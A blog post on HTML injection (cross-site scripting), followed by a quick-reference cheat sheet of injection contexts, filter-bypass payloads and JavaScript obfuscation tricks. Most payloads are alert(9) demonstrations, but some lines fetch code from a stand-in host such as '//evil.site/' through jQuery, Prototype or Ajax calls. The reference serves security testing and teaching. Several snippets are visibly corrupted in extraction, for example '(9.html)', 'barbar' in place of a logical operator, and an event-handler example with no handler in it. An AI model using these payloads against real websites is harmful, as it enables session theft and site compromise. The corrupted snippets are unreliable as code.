HTML Injection – Deadliest Web Attacks

Some articles on HTML Injection and XSS:

Intro

Friends, Romans, visitors, lend me your eyes. I’ve added an HTML injection quick reference (HIQR) to the site. It’s not in iambic pentameter, but there’s a certain rhythm to the placement of quotation marks, less-than signs, and alert() functions.

For those unfamiliar with HTML injection (or cross-site scripting in the vulgate), it’s a vulnerability that enables an attacker to modify a page in order to affect the behavior of a victim’s browser. As the name suggests, the attacker injects markup or JavaScript, usually via a form field or querystring parameter, into a string that is then re-displayed by the app. In the worst cases, the app delivers malicious content to anyone who visits the infected page. Insecure string concatenation is the most common programming error that leads to this flaw.

Imagine an app that permits users to write tags in posts to show off cute pictures of spiders. The app expects users to add images with src attributes that point anywhere on the web. For example,

<img src="http://web.site/image.png">

Were users of the app to limit themselves to nicely formed http: or https: schemes, all would be well in the world. However, there’s already trouble brewing in the form of javascript: schemes. For example, a malicious user could inject arbitrary JavaScript into the page — a dangerous situation considering the JavaScript will be executing within the Same Origin Policy of the web app.

<img src="javascript:alert(9)">

Then there’s the trouble with attributes. Even if the site restricted schemes to http: or https: a (not-at-all) devious hacker could add an inline event handler, for example,

<img src="http://&">

Now the attacker has two ways of executing JavaScript in their victim’s browsers — javascript: schemes and event handlers.

There’s more. Suppose the app writes anything the user submits into the web page. We’ll even imagine that the app’s developers have decided to enforce an http: or https: scheme and they only allow visitors to define a src value. In order to be more secure, the web app writes the src value into an element that’s guaranteed to not have any event handlers. This is where string concatenation rears its ugly, insecure head. For example, the hacker submits the following src attribute:

http:">alert(9)

The app pops this value into the src attribute and, presto!, a new element appears. Notice the two characters at the end of the line, “>, these were the intended end of the src attribute and tag, which were subverted by the hacker’s payload:

<img src="http:">alert(9)>">

HTML injection attacks become increasingly complex depending on the context where the payload is rendered, the characters that are stripped or escaped by data validation filters, the patterns used to detect malicious payloads, and the encoding of the payloads and the page. Check out chapter 2 of HWA for more background on these situations.

You’ll find more info on this blog in articles with an “html injection” category or tag.

SPQR (Senātus Populusque Rōmānus) was the Latin abbreviation used to refer to the collective citizens of the Roman empire. Read up on HTML injection and you’ll become SPQH (Senātus Populusque Haxxor) soon enough.

HTML Injection Quick Reference (HIQR)

Mike Shema, Deadliest Web Attacks The latest revision is at https://mutantzombie.github.io/HIQR/hiqr.html

Table 1: Injection Techniques for Various Parsing Contexts
Table 2: Payload Crafting Techniques to Bypass Filters and Data Validation
Table 3: JavaScript Compositions for Manipulation & Obfuscation

Table 1: Injection Techniques for Various Parsing Contexts

Context State Injection Example
Data State
(Text node,
open tag)

</element>
--> ]]>
Welcome back, <script>☣</script>... <title>Search Results for ‘</title>☣‘ <-- lorem ipsem--><script>☣<script>--> <FOO><![CDATA[]]><script>☣</script>]]>
Attribute
value

Unquoted

Single-quoted
(U+0027) Double-quoted
(U+0022)

<input type=text name=foo value=a><script>☣<script>> <input type=text name=foo value=a/><script>☣<script>> <input type=text name=foo value=''onevent=☣//'>

<input type=text name=foo value=""onevent=☣//">

JavaScript
variable
assignment

Unquoted

Single-quoted
(U+0027) Double-quoted
(U+0022) Escape characters

<script> var foo='';☣;//';

<script> var foo="";☣
;//";

(blog post)

JavaScript
Window.location
object property
.hash
.href
.pathname
.search

URL

#fragment

#jQuery

http://web.site/page/<script>☣<script> <script>document.write("Page not found: " + window.location);

<script>document.write(window.location);

http://web.site/page#<img/src=%22%22onerror=☣> $(document).ready(function() { var x = (window.location.hash.match(/^#([^\/].+)$/) barbar [])[1]; var w = $('a[name="' + x + '"], [id="' + x + '"]'); });

Footnotes

1 The biohazard symbol (U+2623) – ☣ – in each example represents a JavaScript payload. It could be anything from a while loop to DoS the browser, e.g. var a;while(1){a+=“a”} to the ubiquitous alert(9). These categories focus on the placement of the payload within the rendered document rather than the effect of the payload.
Though it seems daunting to review the HTML5 syntax specification, doing so aids in understanding how HTML is supposed to be formed. HTML5 defines an explicit algorithm for parsing HTML documents. Read through the spec to become familiar with the expectations of Unicode code points, parse errors, and decisions a User Agent may make when dealing with markup. A standardized approach to parsing is supposed to minimize the quirks and differences among browsers, thus removing a historical source of insecurity. The HTML4 spec was not as clear or as rigourous on parsing.
2 Sometimes it’s helpful to insert a space before the –> to ensure the tag is interpreted. [ HTML5 comments ]
3 This is a quirk of jQuery’s design choice for overloading the $() API to accept selectors or elements. Read about the interplay of JavaScript and Content Security Policy on the blog.

Table 2: Payload Crafting Techniques to Bypass Filters and Data Validation

Concept Notes Payload Example
Alternate
attribute
delimiters

Foward slash Dangling quoted string

CRLF instead of space

<img/src=""onerror=alert(9)> <a'' href'' onclick=alert(9)>foo</a> <a"" href=""onclick=alert(9)>foo</a> <img%0d%0asrc=""%0d%0aonerror=alert(9)>
HTML
entity
encoding
JavaScript scheme (Decimal, hex,
unicode)
<a href="java&#115;cript:alert(9)">foo</a> <a href="java&#x73;cript:alert(9)">foo</a> <a href="java&#x0073;cript:alert(9)">foo</a>
JavaScript
inline event handlers html4 or html5
Unquoted Double-quoted Single-quoted HTML5 autofocus <input type=text name=foo value=a%20onchange=alert(9)> <input type="text" name="foo" value=""onmouseover=alert(9)//"> <input type='text' name='foo' value=''onclick=alert(9)//'> <input type="text" name="foo" value=""autofocus/onfocus=alert(9)//">
Data URI handlers

src & href attributes

Base64 data

Alternate
character sets

<a href="data:text/html,<script>alert(9)</script>">foo</a> <script src="data:,alert(9)"></script> <script src="data:application/x-javascript,alert(9)"></script>

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg">foo</a> <script src="data:;base64,YWxlcnQoOSk"></script>

<a href="data:text/html;charset=utf-16, %ff%fe%3c%00s%00c%00r%00i%00p%00t%00%3e %00a%00l%00e%00r%00t%00(%009%00)%00 <%00/%00s%00c%00r%00i%00p%00t%00>%00">foo</a>

Alternate
markup
SVG <svg onload="javascript:alert(9)" xmlns="http://www.w3.org/2000/svg"></svg> <svg xmlns="http://www.w3.org/2000/svg"> <g onload="javascript:alert(9)"></g></svg> <svg><script xlink:href=data:,alert(9)></script> <svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(9)"> <rect width="1000" height="1000" fill="white"/></a></svg>
Untidy
markup

Missing greater-than sign

Recover from syntax error

Uncommon syntax

Orphan entity

Vestigal attribute

<script%0d%0aalert(9)</script> <script%20<!--%20-->alert(9)</script>

<a href=""&<img&amp;/onclick=alert(9)>foo</a> <script/<a>alert(9)</script> <script/<a>alert(9)</script </a>

<a""id=a href=''onclick=alert(9)>foo</a>

<a href=""&amp;/onclick=alert(9)>foo</a>

<script/id="a">alert(9)</script>

Anti-regex
patterns

Element closed prematurely

Element confusion

Quote confusion

Quote confusion with element

Quote mixing with element

Recursive elements

Repeated attributes (match last occurence)

<img src=">"onerror=alert(9)>

<img id="><"class="><"src=">"onerror=alert(9)>

<img src="\"a=">"onerror=alert(9)> <a id=' href="">'href=javascript:alert(9)>foo</a> <a id='href=http://web.site/'onclick=alert(9)>foo</a> <a href= . '"\' onclick=alert(9) '"'>foo</a>

<img src="\"'<a href='">"'onerror=alert(9)> <a id='http://web.site/'onclick=alert(9)<!--href=a>foo</a>-->

<img src="'"id='<img src="">'onerror=alert(9)>

<img src="<img src='<img src=.>'>"onerror=alert(9)>

<a href=javascript:alert(9) href href='' href="">foo</a>

Footnotes

1 HTML5’s Content Security Policy headers can neutralize these attacks by preventing the User Agent from executing JavaScript within this context unless the page author is forced to include the “unsafe-inline” directive.
2 The basic format is dataurl := “data:” [ mediatype ] [ “;base64” ] “,” data. The scheme is defined in RFC 2397.
3 Per HTML5 spec, “When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).”

Table 3: JavaScript Compositions for Manipulation & Obfuscation

Technique Notes Example
Concatenation

String operators

Locigal operators

Mathematical operators

var a = "foo"+alert(9)//";

var a = "foo"&&alert(9)//";

var a = "foo"&&alert(9)//";

Function execution

Anonymouns

Method lookup

(function(){alert(9)})()

window["alert"](9.html)

Strings

String object

Regex object

source attribute

String.fromCharCode(0x61,0x62)

alert(/foo bar/.source)

window[/alert/.source](9.html)

Harness function from a JavaScript library

Angular

Ember JS

jQuery

Prototype

Underscore

angular.bind(self, alert, 9)() angular.element.apply(alert(9))

Ember.run(null, alert, 9)

$.get('//evil.site/') (site serves alert(9)) $.getScript('//evil.site/') (site serves alert(9)) $('#main').load('//evil.site/'); (site serves <script>alert(9)</script> into selector, e.g. #main)

Prototype.K(alert)(9) new Ajax.Request('//evil.site/')

_.defer(alert, 9) _.delay(alert, 0, 9) _.once(alert(9))

Type coercion
  1. Boolean plus Object converts to String

  2. Extract character from String by index

  3. Compose String from characters

  4. Execute function by method lookup

false + "" == "false" ![] + []

( false + "" )[1] == "a" ( ![] + [] )[1]

(![]+[])[1] + (![]+[])[2] + (![]+[])[4] + (!![]+[])[1] + (!![]+[])[0]

(window["alert"])(9) (window["ale"+"rt"])(9) (window[(![]+[])[1] + (![]+[])[2] + (![]+[])[4] + (!![]+[])[1] + (!![]+[])[0]])(9)